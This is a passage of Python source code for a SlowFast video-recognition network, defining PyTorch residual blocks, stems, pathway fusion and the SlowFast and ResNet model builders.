self.c = nn.Conv3d(dim_inner, dim_out, kernel_size=[1, 1, 1], stride=[1, 1, 1], padding=[0, 0, 0], bias=False)
self.c_bn = norm_module(num_features=dim_out, eps=self._eps, momentum=self._bn_mmt)
self.c_bn.transform_final_bn = True
def forward(self, x):
for block in self.children():
x = block(x)
return x
class BottleneckTransform(nn.Module):
"""
Bottleneck transformation: Tx1x1, 1x3x3, 1x1x1, where T is the size of
temporal kernel.
"""
def __init__(self, dim_in, dim_out, temp_kernel_size, stride, dim_inner, num_groups, stride_1x1=False, inplace_relu=True, eps=1e-05, bn_mmt=0.1, dilation=1, norm_module=nn.BatchNorm3d, block_idx=0):
"""
Args:
dim_in (int): the channel dimensions of the input.
dim_out (int): the channel dimension of the output.
temp_kernel_size (int): the temporal kernel sizes of the first
convolution in the bottleneck.
stride (int): the stride of the bottleneck.
dim_inner (int): the inner dimension of the block.
num_groups (int): number of groups for the convolution. num_groups=1
is for standard ResNet like networks, and num_groups>1 is for
ResNeXt like networks.
stride_1x1 (bool): if True, apply stride to 1x1 conv, otherwise
apply stride to the 3x3 conv.
inplace_relu (bool): if True, calculate the relu on the original
input without allocating new memory.
eps (float): epsilon for batch norm.
bn_mmt (float): momentum for batch norm. Noted that BN momentum in
PyTorch = 1 - BN momentum in Caffe2.
dilation (int): size of dilation.
norm_module (nn.Module): nn.Module for the normalization layer. The
default is nn.BatchNorm3d.
"""
super(BottleneckTransform, self).__init__()
self.temp_kernel_size = temp_kernel_size
self._inplace_relu = inplace_relu
self._eps = eps
self._bn_mmt = bn_mmt
self._stride_1x1 = stride_1x1
self._construct(dim_in, dim_out, stride, dim_inner, num_groups, dilation, norm_module)
def _construct(self, dim_in, dim_out, stride, dim_inner, num_groups, dilation, norm_module):
str1x1, str3x3 = (stride, 1) if self._stride_1x1 else (1, stride)
self.a = nn.Conv3d(dim_in, dim_inner, kernel_size=[self.temp_kernel_size, 1, 1], stride=[1, str1x1, str1x1], padding=[int(self.temp_kernel_size // 2), 0, 0], bias=False)
self.a_bn = norm_module(num_features=dim_inner, eps=self._eps, momentum=self._bn_mmt)
self.a_relu = nn.ReLU(inplace=self._inplace_relu)
self.b = nn.Conv3d(dim_inner, dim_inner, [1, 3, 3], stride=[1, str3x3, str3x3], padding=[0, dilation, dilation], groups=num_groups, bias=False, dilation=[1, dilation, dilation])
self.b_bn = norm_module(num_features=dim_inner, eps=self._eps, momentum=self._bn_mmt)
self.b_relu = nn.ReLU(inplace=self._inplace_relu)
self.c = nn.Conv3d(dim_inner, dim_out, kernel_size=[1, 1, 1], stride=[1, 1, 1], padding=[0, 0, 0], bias=False)
self.c_bn = norm_module(num_features=dim_out, eps=self._eps, momentum=self._bn_mmt)
self.c_bn.transform_final_bn = True
def forward(self, x):
x = self.a(x)
x = self.a_bn(x)
x = self.a_relu(x)
x = self.b(x)
x = self.b_bn(x)
x = self.b_relu(x)
x = self.c(x)
x = self.c_bn(x)
return x
class ResBlock(nn.Module):
"""
Residual block.
"""
def __init__(self, dim_in, dim_out, temp_kernel_size, stride, trans_func, dim_inner, num_groups=1, stride_1x1=False, inplace_relu=True, eps=1e-05, bn_mmt=0.1, dilation=1, norm_module=nn.BatchNorm3d, block_idx=0, drop_connect_rate=0.0):
"""
ResBlock class constructs redisual blocks. More details can be found in:
Kaiming He, Xiangyu Zhang, Shaoqing Ren, and Jian Sun.
"Deep residual learning for image recognition."
https://arxiv.org/abs/1512.03385
Args:
dim_in (int): the channel dimensions of the input.
dim_out (int): the channel dimension of the output.
temp_kernel_size (int): the temporal kernel sizes of the middle
convolution in the bottleneck.
stride (int): the stride of the bottleneck.
trans_func (string): transform function to be used to construct the
bottleneck.
dim_inner (int): the inner dimension of the block.
num_groups (int): number of groups for the convolution. num_groups=1
is for standard ResNet like networks, and num_groups>1 is for
ResNeXt like networks.
stride_1x1 (bool): if True, apply stride to 1x1 conv, otherwise
apply stride to the 3x3 conv.
inplace_relu (bool): calculate the relu on the original input
without allocating new memory.
eps (float): epsilon for batch norm.
bn_mmt (float): momentum for batch norm. Noted that BN momentum in
PyTorch = 1 - BN momentum in Caffe2.
dilation (int): size of dilation.
norm_module (nn.Module): nn.Module for the normalization layer. The
default is nn.BatchNorm3d.
drop_connect_rate (float): basic rate at which blocks are dropped,
linearly increases from input to output blocks.
"""
super(ResBlock, self).__init__()
self._inplace_relu = inplace_relu
self._eps = eps
self._bn_mmt = bn_mmt
self._drop_connect_rate = drop_connect_rate
self._construct(dim_in, dim_out, temp_kernel_size, stride, trans_func, dim_inner, num_groups, stride_1x1, inplace_relu, dilation, norm_module, block_idx)
def _construct(self, dim_in, dim_out, temp_kernel_size, stride, trans_func, dim_inner, num_groups, stride_1x1, inplace_relu, dilation, norm_module, block_idx):
if dim_in != dim_out or stride != 1:
self.branch1 = nn.Conv3d(dim_in, dim_out, kernel_size=1, stride=[1, stride, stride], padding=0, bias=False, dilation=1)
self.branch1_bn = norm_module(num_features=dim_out, eps=self._eps, momentum=self._bn_mmt)
self.branch2 = trans_func(dim_in, dim_out, temp_kernel_size, stride, dim_inner, num_groups, stride_1x1=stride_1x1, inplace_relu=inplace_relu, dilation=dilation, norm_module=norm_module, block_idx=block_idx)
self.relu = nn.ReLU(self._inplace_relu)
def _drop_connect(self, x, drop_ratio):
"""Apply dropconnect to x"""
keep_ratio = 1.0 - drop_ratio
mask = torch.empty([x.shape[0], 1, 1, 1, 1], dtype=x.dtype, device=x.device)
mask.bernoulli_(keep_ratio)
x.div_(keep_ratio)
x.mul_(mask)
return x
def forward(self, x):
f_x = self.branch2(x)
if self.training and self._drop_connect_rate > 0.0:
f_x = self._drop_connect(f_x, self._drop_connect_rate)
if hasattr(self, 'branch1'):
x = self.branch1_bn(self.branch1(x)) + f_x
else:
x = x + f_x
x = self.relu(x)
return x
def get_trans_func(name):
"""
Retrieves the transformation module by name.
"""
trans_funcs = {'bottleneck_transform': BottleneckTransform, 'basic_transform': BasicTransform, 'x3d_transform': X3DTransform}
assert name in trans_funcs.keys(), "Transformation function '{}' not supported".format(name)
return trans_funcs[name]
class ResStage(nn.Module):
"""
Stage of 3D ResNet. It expects to have one or more tensors as input for
single pathway (C2D, I3D, Slow), and multi-pathway (SlowFast) cases.
More details can be found here:
Christoph Feichtenhofer, Haoqi Fan, Jitendra Malik, and Kaiming He.
"SlowFast networks for video recognition."
https://arxiv.org/pdf/1812.03982.pdf
"""
def __init__(self, dim_in, dim_out, stride, temp_kernel_sizes, num_blocks, dim_inner, num_groups, num_block_temp_kernel, nonlocal_inds, nonlocal_group, nonlocal_pool, dilation, instantiation='softmax', trans_func_name='bottleneck_transform', stride_1x1=False, inplace_relu=True, norm_module=nn.BatchNorm3d, drop_connect_rate=0.0):
"""
The `__init__` method of any subclass should also contain these arguments.
ResStage builds p streams, where p can be greater or equal to one.
Args:
dim_in (list): list of p the channel dimensions of the input.
Different channel dimensions control the input dimension of
different pathways.
dim_out (list): list of p the channel dimensions of the output.
Different channel dimensions control the input dimension of
different pathways.
temp_kernel_sizes (list): list of the p temporal kernel sizes of the
convolution in the bottleneck. Different temp_kernel_sizes
control different pathway.
stride (list): list of the p strides of the bottleneck. Different
stride control different pathway.
num_blocks (list): list of p numbers of blocks for each of the
pathway.
dim_inner (list): list of the p inner channel dimensions of the
input. Different channel dimensions control the input dimension
of different pathways.
num_groups (list): list of number of p groups for the convolution.
num_groups=1 is for standard ResNet like networks, and
num_groups>1 is for ResNeXt like networks.
num_block_temp_kernel (list): extent the temp_kernel_sizes to
num_block_temp_kernel blocks, then fill temporal kernel size
of 1 for the rest of the layers.
nonlocal_inds (list): If the tuple is empty, no nonlocal layer will
be added. If the tuple is not empty, add nonlocal layers after
the index-th block.
dilation (list): size of dilation for each pathway.
nonlocal_group (list): list of number of p nonlocal groups. Each
number controls how to fold temporal dimension to batch
dimension before applying nonlocal transformation.
https://github.com/facebookresearch/video-nonlocal-net.
instantiation (string): different instantiation for nonlocal layer.
Supports two different instantiation method:
"dot_product": normalizing correlation matrix with L2.
"softmax": normalizing correlation matrix with Softmax.
trans_func_name (string): name of the the transformation function apply
on the network.
norm_module (nn.Module): nn.Module for the normalization layer. The
default is nn.BatchNorm3d.
drop_connect_rate (float): basic rate at which blocks are dropped,
linearly increases from input to output blocks.
"""
super(ResStage, self).__init__()
assert all(num_block_temp_kernel[i] <= num_blocks[i] for i in range(len(temp_kernel_sizes)))
self.num_blocks = num_blocks
self.nonlocal_group = nonlocal_group
self._drop_connect_rate = drop_connect_rate
self.temp_kernel_sizes = [((temp_kernel_sizes[i] * num_blocks[i])[:num_block_temp_kernel[i]] + [1] * (num_blocks[i] - num_block_temp_kernel[i])) for i in range(len(temp_kernel_sizes))]
assert len({len(dim_in), len(dim_out), len(temp_kernel_sizes), len(stride), len(num_blocks), len(dim_inner), len(num_groups), len(num_block_temp_kernel), len(nonlocal_inds), len(nonlocal_group)}) == 1
self.num_pathways = len(self.num_blocks)
self._construct(dim_in, dim_out, stride, dim_inner, num_groups, trans_func_name, stride_1x1, inplace_relu, nonlocal_inds, nonlocal_pool, instantiation, dilation, norm_module)
def _construct(self, dim_in, dim_out, stride, dim_inner, num_groups, trans_func_name, stride_1x1, inplace_relu, nonlocal_inds, nonlocal_pool, instantiation, dilation, norm_module):
for pathway in range(self.num_pathways):
for i in range(self.num_blocks[pathway]):
trans_func = get_trans_func(trans_func_name)
res_block = ResBlock(dim_in[pathway] if i == 0 else dim_out[pathway], dim_out[pathway], self.temp_kernel_sizes[pathway][i], stride[pathway] if i == 0 else 1, trans_func, dim_inner[pathway], num_groups[pathway], stride_1x1=stride_1x1, inplace_relu=inplace_relu, dilation=dilation[pathway], norm_module=norm_module, block_idx=i, drop_connect_rate=self._drop_connect_rate)
self.add_module('pathway{}_res{}'.format(pathway, i), res_block)
if i in nonlocal_inds[pathway]:
nln = Nonlocal(dim_out[pathway], dim_out[pathway] // 2, nonlocal_pool[pathway], instantiation=instantiation, norm_module=norm_module)
self.add_module('pathway{}_nonlocal{}'.format(pathway, i), nln)
def forward(self, inputs):
output = []
for pathway in range(self.num_pathways):
x = inputs[pathway]
for i in range(self.num_blocks[pathway]):
m = getattr(self, 'pathway{}_res{}'.format(pathway, i))
x = m(x)
if hasattr(self, 'pathway{}_nonlocal{}'.format(pathway, i)):
nln = getattr(self, 'pathway{}_nonlocal{}'.format(pathway, i))
b, c, t, h, w = x.shape
if self.nonlocal_group[pathway] > 1:
x = x.permute(0, 2, 1, 3, 4)
x = x.reshape(b * self.nonlocal_group[pathway], t // self.nonlocal_group[pathway], c, h, w)
x = x.permute(0, 2, 1, 3, 4)
x = nln(x)
if self.nonlocal_group[pathway] > 1:
x = x.permute(0, 2, 1, 3, 4)
x = x.reshape(b, t, c, h, w)
x = x.permute(0, 2, 1, 3, 4)
output.append(x)
return output
class ResNetBasicStem(nn.Module):
"""
ResNe(X)t 3D stem module.
Performs spatiotemporal Convolution, BN, and Relu following by a
spatiotemporal pooling.
"""
def __init__(self, dim_in, dim_out, kernel, stride, padding, inplace_relu=True, eps=1e-05, bn_mmt=0.1, norm_module=nn.BatchNorm3d):
"""
The `__init__` method of any subclass should also contain these arguments.
Args:
dim_in (int): the channel dimension of the input. Normally 3 is used
for rgb input, and 2 or 3 is used for optical flow input.
dim_out (int): the output dimension of the convolution in the stem
layer.
kernel (list): the kernel size of the convolution in the stem layer.
temporal kernel size, height kernel size, width kernel size in
order.
stride (list): the stride size of the convolution in the stem layer.
temporal kernel stride, height kernel size, width kernel size in
order.
padding (int): the padding size of the convolution in the stem
layer, temporal padding size, height padding size, width
padding size in order.
inplace_relu (bool): calculate the relu on the original input
without allocating new memory.
eps (float): epsilon for batch norm.
bn_mmt (float): momentum for batch norm. Noted that BN momentum in
PyTorch = 1 - BN momentum in Caffe2.
norm_module (nn.Module): nn.Module for the normalization layer. The
default is nn.BatchNorm3d.
"""
super(ResNetBasicStem, self).__init__()
self.kernel = kernel
self.stride = stride
self.padding = padding
self.inplace_relu = inplace_relu
self.eps = eps
self.bn_mmt = bn_mmt
self._construct_stem(dim_in, dim_out, norm_module)
def _construct_stem(self, dim_in, dim_out, norm_module):
self.conv = nn.Conv3d(dim_in, dim_out, self.kernel, stride=self.stride, padding=self.padding, bias=False)
self.bn = norm_module(num_features=dim_out, eps=self.eps, momentum=self.bn_mmt)
self.relu = nn.ReLU(self.inplace_relu)
self.pool_layer = nn.MaxPool3d(kernel_size=[1, 3, 3], stride=[1, 2, 2], padding=[0, 1, 1])
def forward(self, x):
x = self.conv(x)
x = self.bn(x)
x = self.relu(x)
x = self.pool_layer(x)
return x
class X3DStem(nn.Module):
"""
X3D's 3D stem module.
Performs a spatial followed by a depthwise temporal Convolution, BN, and Relu following by a
spatiotemporal pooling.
"""
def __init__(self, dim_in, dim_out, kernel, stride, padding, inplace_relu=True, eps=1e-05, bn_mmt=0.1, norm_module=nn.BatchNorm3d):
"""
The `__init__` method of any subclass should also contain these arguments.
Args:
dim_in (int): the channel dimension of the input. Normally 3 is used
for rgb input, and 2 or 3 is used for optical flow input.
dim_out (int): the output dimension of the convolution in the stem
layer.
kernel (list): the kernel size of the convolution in the stem layer.
temporal kernel size, height kernel size, width kernel size in
order.
stride (list): the stride size of the convolution in the stem layer.
temporal kernel stride, height kernel size, width kernel size in
order.
padding (int): the padding size of the convolution in the stem
layer, temporal padding size, height padding size, width
padding size in order.
inplace_relu (bool): calculate the relu on the original input
without allocating new memory.
eps (float): epsilon for batch norm.
bn_mmt (float): momentum for batch norm. Noted that BN momentum in
PyTorch = 1 - BN momentum in Caffe2.
norm_module (nn.Module): nn.Module for the normalization layer. The
default is nn.BatchNorm3d.
"""
super(X3DStem, self).__init__()
self.kernel = kernel
self.stride = stride
self.padding = padding
self.inplace_relu = inplace_relu
self.eps = eps
self.bn_mmt = bn_mmt
self._construct_stem(dim_in, dim_out, norm_module)
def _construct_stem(self, dim_in, dim_out, norm_module):
self.conv_xy = nn.Conv3d(dim_in, dim_out, kernel_size=(1, self.kernel[1], self.kernel[2]), stride=(1, self.stride[1], self.stride[2]), padding=(0, self.padding[1], self.padding[2]), bias=False)
self.conv = nn.Conv3d(dim_out, dim_out, kernel_size=(self.kernel[0], 1, 1), stride=(self.stride[0], 1, 1), padding=(self.padding[0], 0, 0), bias=False, groups=dim_out)
self.bn = norm_module(num_features=dim_out, eps=self.eps, momentum=self.bn_mmt)
self.relu = nn.ReLU(self.inplace_relu)
def forward(self, x):
x = self.conv_xy(x)
x = self.conv(x)
x = self.bn(x)
x = self.relu(x)
return x
def get_stem_func(name):
"""
Retrieves the stem module by name.
"""
trans_funcs = {'x3d_stem': X3DStem, 'basic_stem': ResNetBasicStem}
assert name in trans_funcs.keys(), "Transformation function '{}' not supported".format(name)
return trans_funcs[name]
class VideoModelStem(nn.Module):
"""
Video 3D stem module. Provides stem operations of Conv, BN, ReLU, MaxPool
on input data tensor for one or multiple pathways.
"""
def __init__(self, dim_in, dim_out, kernel, stride, padding, inplace_relu=True, eps=1e-05, bn_mmt=0.1, norm_module=nn.BatchNorm3d, stem_func_name='basic_stem'):
"""
The `__init__` method of any subclass should also contain these
arguments. List size of 1 for single pathway models (C2D, I3D, Slow
and etc), list size of 2 for two pathway models (SlowFast).
Args:
dim_in (list): the list of channel dimensions of the inputs.
dim_out (list): the output dimension of the convolution in the stem
layer.
kernel (list): the kernels' size of the convolutions in the stem
layers. Temporal kernel size, height kernel size, width kernel
size in order.
stride (list): the stride sizes of the convolutions in the stem
layer. Temporal kernel stride, height kernel size, width kernel
size in order.
padding (list): the paddings' sizes of the convolutions in the stem
layer. Temporal padding size, height padding size, width padding
size in order.
inplace_relu (bool): calculate the relu on the original input
without allocating new memory.
eps (float): epsilon for batch norm.
bn_mmt (float): momentum for batch norm. Noted that BN momentum in
PyTorch = 1 - BN momentum in Caffe2.
norm_module (nn.Module): nn.Module for the normalization layer. The
default is nn.BatchNorm3d.
stem_func_name (string): name of the the stem function applied on
input to the network.
"""
super(VideoModelStem, self).__init__()
assert len({len(dim_in), len(dim_out), len(kernel), len(stride), len(padding)}) == 1, 'Input pathway dimensions are not consistent.'
self.num_pathways = len(dim_in)
self.kernel = kernel
self.stride = stride
self.padding = padding
self.inplace_relu = inplace_relu
self.eps = eps
self.bn_mmt = bn_mmt
self._construct_stem(dim_in, dim_out, norm_module, stem_func_name)
def _construct_stem(self, dim_in, dim_out, norm_module, stem_func_name):
trans_func = get_stem_func(stem_func_name)
for pathway in range(len(dim_in)):
stem = trans_func(dim_in[pathway], dim_out[pathway], self.kernel[pathway], self.stride[pathway], self.padding[pathway], self.inplace_relu, self.eps, self.bn_mmt, norm_module)
self.add_module('pathway{}_stem'.format(pathway), stem)
def forward(self, x):
assert len(x) == self.num_pathways, 'Input tensor does not contain {} pathway'.format(self.num_pathways)
for pathway in range(len(x)):
m = getattr(self, 'pathway{}_stem'.format(pathway))
x[pathway] = m(x[pathway])
return x
class FuseFastToSlow(nn.Module):
"""
Fuses the information from the Fast pathway to the Slow pathway. Given the
tensors from Slow pathway and Fast pathway, fuse information from Fast to
Slow, then return the fused tensors from Slow and Fast pathway in order.
"""
def __init__(self, dim_in, fusion_conv_channel_ratio, fusion_kernel, alpha, eps=1e-05, bn_mmt=0.1, inplace_relu=True, norm_module=nn.BatchNorm3d):
"""
Args:
dim_in (int): the channel dimension of the input.
fusion_conv_channel_ratio (int): channel ratio for the convolution
used to fuse from Fast pathway to Slow pathway.
fusion_kernel (int): kernel size of the convolution used to fuse
from Fast pathway to Slow pathway.
alpha (int): the frame rate ratio between the Fast and Slow pathway.
eps (float): epsilon for batch norm.
bn_mmt (float): momentum for batch norm. Noted that BN momentum in
PyTorch = 1 - BN momentum in Caffe2.
inplace_relu (bool): if True, calculate the relu on the original
input without allocating new memory.
norm_module (nn.Module): nn.Module for the normalization layer. The
default is nn.BatchNorm3d.
"""
super(FuseFastToSlow, self).__init__()
self.conv_f2s = nn.Conv3d(dim_in, dim_in * fusion_conv_channel_ratio, kernel_size=[fusion_kernel, 1, 1], stride=[alpha, 1, 1], padding=[fusion_kernel // 2, 0, 0], bias=False)
self.bn = norm_module(num_features=dim_in * fusion_conv_channel_ratio, eps=eps, momentum=bn_mmt)
self.relu = nn.ReLU(inplace_relu)
def forward(self, x):
x_s = x[0]
x_f = x[1]
fuse = self.conv_f2s(x_f)
fuse = self.bn(fuse)
fuse = self.relu(fuse)
x_s_fuse = torch.cat([x_s, fuse], 1)
return [x_s_fuse, x_f]
_MODEL_STAGE_DEPTH = {(50): (3, 4, 6, 3), (101): (3, 4, 23, 3)}
_POOL1 = {'c2d': [[2, 1, 1]], 'c2d_nopool': [[1, 1, 1]], 'i3d': [[2, 1, 1]], 'i3d_nopool': [[1, 1, 1]], 'slow': [[1, 1, 1]], 'slowfast': [[1, 1, 1], [1, 1, 1]], 'x3d': [[1, 1, 1]]}
_TEMPORAL_KERNEL_BASIS = {'c2d': [[[1]], [[1]], [[1]], [[1]], [[1]]], 'c2d_nopool': [[[1]], [[1]], [[1]], [[1]], [[1]]], 'i3d': [[[5]], [[3]], [[3, 1]], [[3, 1]], [[1, 3]]], 'i3d_nopool': [[[5]], [[3]], [[3, 1]], [[3, 1]], [[1, 3]]], 'slow': [[[1]], [[1]], [[1]], [[3]], [[3]]], 'slowfast': [[[1], [5]], [[1], [3]], [[1], [3]], [[3], [3]], [[3], [3]]], 'x3d': [[[5]], [[3]], [[3]], [[3]], [[3]]]}
def get_norm(cfg):
"""
Args:
cfg (CfgNode): model building configs, details are in the comments of
the config file.
Returns:
nn.Module: the normalization layer.
"""
if cfg.BN.NORM_TYPE == 'batchnorm':
return nn.BatchNorm3d
elif cfg.BN.NORM_TYPE == 'sub_batchnorm':
return partial(SubBatchNorm3d, num_splits=cfg.BN.NUM_SPLITS)
elif cfg.BN.NORM_TYPE == 'sync_batchnorm':
return partial(NaiveSyncBatchNorm3d, num_sync_devices=cfg.BN.NUM_SYNC_DEVICES)
else:
raise NotImplementedError('Norm type {} is not supported'.format(cfg.BN.NORM_TYPE))
class SlowFast(nn.Module):
"""
SlowFast model builder for SlowFast network.
Christoph Feichtenhofer, Haoqi Fan, Jitendra Malik, and Kaiming He.
"SlowFast networks for video recognition."
https://arxiv.org/pdf/1812.03982.pdf
"""
def __init__(self, cfg):
"""
The `__init__` method of any subclass should also contain these
arguments.
Args:
cfg (CfgNode): model building configs, details are in the
comments of the config file.
"""
super(SlowFast, self).__init__()
self.norm_module = get_norm(cfg)
self.enable_detection = cfg.DETECTION.ENABLE
self.num_pathways = 2
self._construct_network(cfg)
init_helper.init_weights(self, cfg.MODEL.FC_INIT_STD, cfg.RESNET.ZERO_INIT_FINAL_BN)
def _construct_network(self, cfg):
"""
Builds a SlowFast model. The first pathway is the Slow pathway and the
second pathway is the Fast pathway.
Args:
cfg (CfgNode): model building configs, details are in the
comments of the config file.
"""
assert cfg.MODEL.ARCH in _POOL1.keys()
pool_size = _POOL1[cfg.MODEL.ARCH]
assert len({len(pool_size), self.num_pathways}) == 1
assert cfg.RESNET.DEPTH in _MODEL_STAGE_DEPTH.keys()
d2, d3, d4, d5 = _MODEL_STAGE_DEPTH[cfg.RESNET.DEPTH]
num_groups = cfg.RESNET.NUM_GROUPS
width_per_group = cfg.RESNET.WIDTH_PER_GROUP
dim_inner = num_groups * width_per_group
out_dim_ratio = cfg.SLOWFAST.BETA_INV // cfg.SLOWFAST.FUSION_CONV_CHANNEL_RATIO
temp_kernel = _TEMPORAL_KERNEL_BASIS[cfg.MODEL.ARCH]
self.s1 = stem_helper.VideoModelStem(dim_in=cfg.DATA.INPUT_CHANNEL_NUM, dim_out=[width_per_group, width_per_group // cfg.SLOWFAST.BETA_INV], kernel=[temp_kernel[0][0] + [7, 7], temp_kernel[0][1] + [7, 7]], stride=[[1, 2, 2]] * 2, padding=[[temp_kernel[0][0][0] // 2, 3, 3], [temp_kernel[0][1][0] // 2, 3, 3]], norm_module=self.norm_module)
self.s1_fuse = FuseFastToSlow(width_per_group // cfg.SLOWFAST.BETA_INV, cfg.SLOWFAST.FUSION_CONV_CHANNEL_RATIO, cfg.SLOWFAST.FUSION_KERNEL_SZ, cfg.SLOWFAST.ALPHA, norm_module=self.norm_module)
self.s2 = resnet_helper.ResStage(dim_in=[width_per_group + width_per_group // out_dim_ratio, width_per_group // cfg.SLOWFAST.BETA_INV], dim_out=[width_per_group * 4, width_per_group * 4 // cfg.SLOWFAST.BETA_INV], dim_inner=[dim_inner, dim_inner // cfg.SLOWFAST.BETA_INV], temp_kernel_sizes=temp_kernel[1], stride=cfg.RESNET.SPATIAL_STRIDES[0], num_blocks=[d2] * 2, num_groups=[num_groups] * 2, num_block_temp_kernel=cfg.RESNET.NUM_BLOCK_TEMP_KERNEL[0], nonlocal_inds=cfg.NONLOCAL.LOCATION[0], nonlocal_group=cfg.NONLOCAL.GROUP[0], nonlocal_pool=cfg.NONLOCAL.POOL[0], instantiation=cfg.NONLOCAL.INSTANTIATION, trans_func_name=cfg.RESNET.TRANS_FUNC, dilation=cfg.RESNET.SPATIAL_DILATIONS[0], norm_module=self.norm_module)
self.s2_fuse = FuseFastToSlow(width_per_group * 4 // cfg.SLOWFAST.BETA_INV, cfg.SLOWFAST.FUSION_CONV_CHANNEL_RATIO, cfg.SLOWFAST.FUSION_KERNEL_SZ, cfg.SLOWFAST.ALPHA, norm_module=self.norm_module)
for pathway in range(self.num_pathways):
pool = nn.MaxPool3d(kernel_size=pool_size[pathway], stride=pool_size[pathway], padding=[0, 0, 0])
self.add_module('pathway{}_pool'.format(pathway), pool)
self.s3 = resnet_helper.ResStage(dim_in=[width_per_group * 4 + width_per_group * 4 // out_dim_ratio, width_per_group * 4 // cfg.SLOWFAST.BETA_INV], dim_out=[width_per_group * 8, width_per_group * 8 // cfg.SLOWFAST.BETA_INV], dim_inner=[dim_inner * 2, dim_inner * 2 // cfg.SLOWFAST.BETA_INV], temp_kernel_sizes=temp_kernel[2], stride=cfg.RESNET.SPATIAL_STRIDES[1], num_blocks=[d3] * 2, num_groups=[num_groups] * 2, num_block_temp_kernel=cfg.RESNET.NUM_BLOCK_TEMP_KERNEL[1], nonlocal_inds=cfg.NONLOCAL.LOCATION[1], nonlocal_group=cfg.NONLOCAL.GROUP[1], nonlocal_pool=cfg.NONLOCAL.POOL[1], instantiation=cfg.NONLOCAL.INSTANTIATION, trans_func_name=cfg.RESNET.TRANS_FUNC, dilation=cfg.RESNET.SPATIAL_DILATIONS[1], norm_module=self.norm_module)
self.s3_fuse = FuseFastToSlow(width_per_group * 8 // cfg.SLOWFAST.BETA_INV, cfg.SLOWFAST.FUSION_CONV_CHANNEL_RATIO, cfg.SLOWFAST.FUSION_KERNEL_SZ, cfg.SLOWFAST.ALPHA, norm_module=self.norm_module)
self.s4 = resnet_helper.ResStage(dim_in=[width_per_group * 8 + width_per_group * 8 // out_dim_ratio, width_per_group * 8 // cfg.SLOWFAST.BETA_INV], dim_out=[width_per_group * 16, width_per_group * 16 // cfg.SLOWFAST.BETA_INV], dim_inner=[dim_inner * 4, dim_inner * 4 // cfg.SLOWFAST.BETA_INV], temp_kernel_sizes=temp_kernel[3], stride=cfg.RESNET.SPATIAL_STRIDES[2], num_blocks=[d4] * 2, num_groups=[num_groups] * 2, num_block_temp_kernel=cfg.RESNET.NUM_BLOCK_TEMP_KERNEL[2], nonlocal_inds=cfg.NONLOCAL.LOCATION[2], nonlocal_group=cfg.NONLOCAL.GROUP[2], nonlocal_pool=cfg.NONLOCAL.POOL[2], instantiation=cfg.NONLOCAL.INSTANTIATION, trans_func_name=cfg.RESNET.TRANS_FUNC, dilation=cfg.RESNET.SPATIAL_DILATIONS[2], norm_module=self.norm_module)
self.s4_fuse = FuseFastToSlow(width_per_group * 16 // cfg.SLOWFAST.BETA_INV, cfg.SLOWFAST.FUSION_CONV_CHANNEL_RATIO, cfg.SLOWFAST.FUSION_KERNEL_SZ, cfg.SLOWFAST.ALPHA, norm_module=self.norm_module)
self.s5 = resnet_helper.ResStage(dim_in=[width_per_group * 16 + width_per_group * 16 // out_dim_ratio, width_per_group * 16 // cfg.SLOWFAST.BETA_INV], dim_out=[width_per_group * 32, width_per_group * 32 // cfg.SLOWFAST.BETA_INV], dim_inner=[dim_inner * 8, dim_inner * 8 // cfg.SLOWFAST.BETA_INV], temp_kernel_sizes=temp_kernel[4], stride=cfg.RESNET.SPATIAL_STRIDES[3], num_blocks=[d5] * 2, num_groups=[num_groups] * 2, num_block_temp_kernel=cfg.RESNET.NUM_BLOCK_TEMP_KERNEL[3], nonlocal_inds=cfg.NONLOCAL.LOCATION[3], nonlocal_group=cfg.NONLOCAL.GROUP[3], nonlocal_pool=cfg.NONLOCAL.POOL[3], instantiation=cfg.NONLOCAL.INSTANTIATION, trans_func_name=cfg.RESNET.TRANS_FUNC, dilation=cfg.RESNET.SPATIAL_DILATIONS[3], norm_module=self.norm_module)
if cfg.DETECTION.ENABLE:
self.head = head_helper.ResNetRoIHead(dim_in=[width_per_group * 32, width_per_group * 32 // cfg.SLOWFAST.BETA_INV], num_classes=cfg.MODEL.NUM_CLASSES, pool_size=[[cfg.DATA.NUM_FRAMES // cfg.SLOWFAST.ALPHA // pool_size[0][0], 1, 1], [cfg.DATA.NUM_FRAMES // pool_size[1][0], 1, 1]], resolution=[[cfg.DETECTION.ROI_XFORM_RESOLUTION] * 2] * 2, scale_factor=[cfg.DETECTION.SPATIAL_SCALE_FACTOR] * 2, dropout_rate=cfg.MODEL.DROPOUT_RATE, act_func=cfg.MODEL.HEAD_ACT, aligned=cfg.DETECTION.ALIGNED)
else:
head = head_helper.ResNetBasicHead(dim_in=[width_per_group * 32, width_per_group * 32 // cfg.SLOWFAST.BETA_INV], num_classes=cfg.MODEL.NUM_CLASSES, pool_size=[None, None] if cfg.MULTIGRID.SHORT_CYCLE else [[cfg.DATA.NUM_FRAMES // cfg.SLOWFAST.ALPHA // pool_size[0][0], cfg.DATA.TRAIN_CROP_SIZE // 32 // pool_size[0][1], cfg.DATA.TRAIN_CROP_SIZE // 32 // pool_size[0][2]], [cfg.DATA.NUM_FRAMES // pool_size[1][0], cfg.DATA.TRAIN_CROP_SIZE // 32 // pool_size[1][1], cfg.DATA.TRAIN_CROP_SIZE // 32 // pool_size[1][2]]], dropout_rate=cfg.MODEL.DROPOUT_RATE, act_func=cfg.MODEL.HEAD_ACT)
self.head_name = 'head{}'.format(cfg.TASK)
self.add_module(self.head_name, head)
def forward(self, x, bboxes=None):
x = self.s1(x)
x = self.s1_fuse(x)
x = self.s2(x)
x = self.s2_fuse(x)
for pathway in range(self.num_pathways):
pool = getattr(self, 'pathway{}_pool'.format(pathway))
x[pathway] = pool(x[pathway])
x = self.s3(x)
x = self.s3_fuse(x)
x = self.s4(x)
x = self.s4_fuse(x)
x = self.s5(x)
head = getattr(self, self.head_name)
if self.enable_detection:
x = head(x, bboxes)
else:
x = head(x)
return x
class ResNet(nn.Module):
"""
ResNet model builder. It builds a ResNet like network backbone without
lateral connection (C2D, I3D, Slow).
Christoph Feichtenhofer, Haoqi Fan, Jitendra Malik, and Kaiming He.
"SlowFast networks for video recognition."
https://arxiv.org/pdf/1812.03982.pdf
Xiaolong Wang, Ross Girshick, Abhinav Gupta, and Kaiming He.
"Non-local neural networks."
https://arxiv.org/pdf/1711.07971.pdf
"""
def __init__(self, cfg):
"""
The `__init__` method of any subclass should also contain these
arguments.
Args:
cfg (CfgNode): model building configs, details are in the
comments of the config file.
"""
super(ResNet, self).__init__()
self.norm_module = get_norm(cfg)
self.enable_detection = cfg.DETECTION.ENABLE
self.num_pathways = 1
self._construct_network(cfg)
